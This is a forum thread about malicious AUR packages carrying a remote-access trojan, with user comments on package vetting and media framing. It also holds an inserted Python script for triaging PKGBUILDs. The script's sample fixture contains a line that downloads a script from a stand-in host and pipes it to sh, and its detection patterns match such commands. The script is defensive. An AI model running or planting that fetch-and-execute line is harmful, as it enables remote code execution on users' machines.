Arch Linux Users at Risk Again as AUR Hit by Another RAT (news.itsfoss.com)
from KarnaSubarna@lemmy.ml to linux@lemmy.ml on 01 Aug 14:51
https://lemmy.ml/post/34006754

#linux


MyNameIsRichard@lemmy.ml on 01 Aug 15:11

The malicious packages were found and removed quite quickly. Also, anyone who doesn’t blindly install from the AUR would have seen a suspicious .lol URL. I suppose that a genuine package using a .lol URL isn’t impossible, it’s just very unlikely.

These attacks do demonstrate the strength and weakness of the AUR, that anyone can upload anything at any time. The same as flathub and the snap store. Treat all of them with appropriate caution.

KarnaSubarna@lemmy.ml on 01 Aug 15:47

Flatpak does have a concept of Verified Publisher. Many distros ship flatpak app store with default filter set to Verified Publisher only.

danielquinn@lemmy.ca on 01 Aug 16:01

That sounds like a nice feature we could use for the AUR actually. We already have the votes value, but some sort of verification body could help rescue the AUR’s reputation.

Cricket@lemmy.zip on 01 Aug 20:15

> Many distros ship flatpak app store with default filter set to Verified Publisher only.

Also, if your distro doesn’t do this, you can do it yourself. You can modify, for instance, KDE Discover’s flathub repo to use the verified subset.

Feyd@programming.dev on 01 Aug 15:44

I feel like these headlines are designed to be way scarier than the scenarios actually are to people that don’t know much about Arch Linux.

scintilla@beehaw.org on 01 Aug 17:45

Seriously. It’s technically true that there was a RAT on the AUR but the way it’s titled is written to intentionally invoke times where it was more than one thing.

eldavi@lemmy.ml on 01 Aug 18:33

true and part of me suspects that it’s intentional on the part of arch users so that they can continue to tell the world that they “use arch btw” lol

fouc@feddit.uk on 01 Aug 21:24

I think it’s a good thing to frighten users just a little bit. Arch is no longer a niche distro and it was only a matter of time before someone took advantage of the generally unvetted AUR. It’s a wake-up call that the times of good faith are gone and you need to pay attention.

Feyd@programming.dev on 01 Aug 21:34

Just tell them to read the arch wiki page on AUR and take it seriously, IMO

Euphoma@lemmy.ml on 02 Aug 03:08

Instead of someone accidentally ruining your pc, they intentionally ruin your pc!

gazby@lemmy.zip on 02 Aug 04:20

Just standard clickbait, but sounds more serious because we understand the extent to which they’re going out of their way to bend and withhold the facts.

h4x0r@lemmy.dbzer0.com on 01 Aug 16:01

Installing from AUR without reviewing the PKGBUILD is a self pwn.

umbrella@lemmy.ml on 01 Aug 18:08

isn't that well known though? AUR packages are built by third parties (e.g. users) and there were always warnings against just this, no?

LeFantome@programming.dev on 01 Aug 18:22

It is a well known risk but not something that was a real risk numerically. I mean, it still isn’t given the number of packages in the AUR.

This is a couple of malicious packages discovered in a short period though. Not a good sign. It would really impact the AUR if polluting it with malware became common.

You should always inspect AUR packages before installing them but few people do. Many would not even know what they were looking at.

umbrella@lemmy.ml on 01 Aug 18:25

yeah, that’s almost as bad as those apps requiring you to pipe a remote script through sudo shell

atzanteol@sh.itjust.works on 01 Aug 18:40

God I hate those. The worst way to distribute apps.

umbrella@lemmy.ml on 01 Aug 18:48

especially when flatpaks exist now!

electric_nan@lemmy.ml on 01 Aug 21:45

Me, a hacker, targeting anyone who says they use Arch btw.

mugita_sokiovt@discuss.online on 02 Aug 00:29

This is why I just use the Chaotic AUR, knowing that something like this was being posted everywhere. My producer, Neigsendoig, does the exact same with his machine.

We both use CachyOS anyway.

mactan@lemmy.ml on 02 Aug 04:35

I saw two pkgbuilds from the user, I don’t really know what I’m looking at in pkgbuilds generally but these were dead obvious something was bogus. downloading arbitrary files from some url like (segs)(dot)(lol) hopefully sufficiently defanged
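
A small pre-install triage pass of the kind several comments in this thread describe (spotting an unexpected download host in a PKGBUILD), added here as an example that is not part of any comment or of any AUR tooling. The sample PKGBUILD, both host names and the `review_pkgbuild` helper are constructed for illustration; it only points a reviewer at lines to read and does not replace reading the file.

```python
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s'"()<>]+""")
# Hand-written network fetches, i.e. not going through makepkg's source=() array.
FETCH_RE = re.compile(r"\b(curl|wget)\b|urlopen|requests\.get")
# Output piped into a shell, or inline interpreter code.
EXEC_RE = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b|\bpython\d?\s+-c\b|\beval\b")


def review_pkgbuild(text, expected_hosts):
    """Return (line_no, reason, line) tuples that deserve a manual look."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for url in URL_RE.findall(line):
            host = (urlparse(url).hostname or "").lower()
            known = any(host == h or host.endswith("." + h) for h in expected_hosts)
            if not known:
                findings.append((no, f"unexpected host {host}", line))
        if FETCH_RE.search(line):
            findings.append((no, "fetch outside source=()", line))
        if EXEC_RE.search(line):
            findings.append((no, "runs downloaded or inline code", line))
    return findings


# Constructed sample: a package whose upstream is on github.com, plus one
# line in package() that pulls from a host the reviewer does not expect.
SAMPLE = '''\
pkgname=demo-bin
pkgver=1.0
url="https://github.com/example/demo"
source=("https://github.com/example/demo/releases/download/v1.0/demo.tar.gz")
sha256sums=('SKIP')
package() {
  install -Dm755 demo "$pkgdir/usr/bin/demo"
  curl -s https://unexpected-host.test/patch | sh
}
'''

if __name__ == "__main__":
    for no, reason, line in review_pkgbuild(SAMPLE, {"github.com"}):
        print(f"line {no}: {reason}: {line}")
```

Run it against the PKGBUILD and any `.install` file before `makepkg`, passing the hosts you expect for that project's upstream.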

teawrecks@sopuli.xyz on 02 Aug 05:25

Man, we’re gonna have to change the name of the AUR because bad journalists keep thinking this has something to do with the distro.

“Arch Linux Users who go out of their way to install RAT at risk of installing RAT”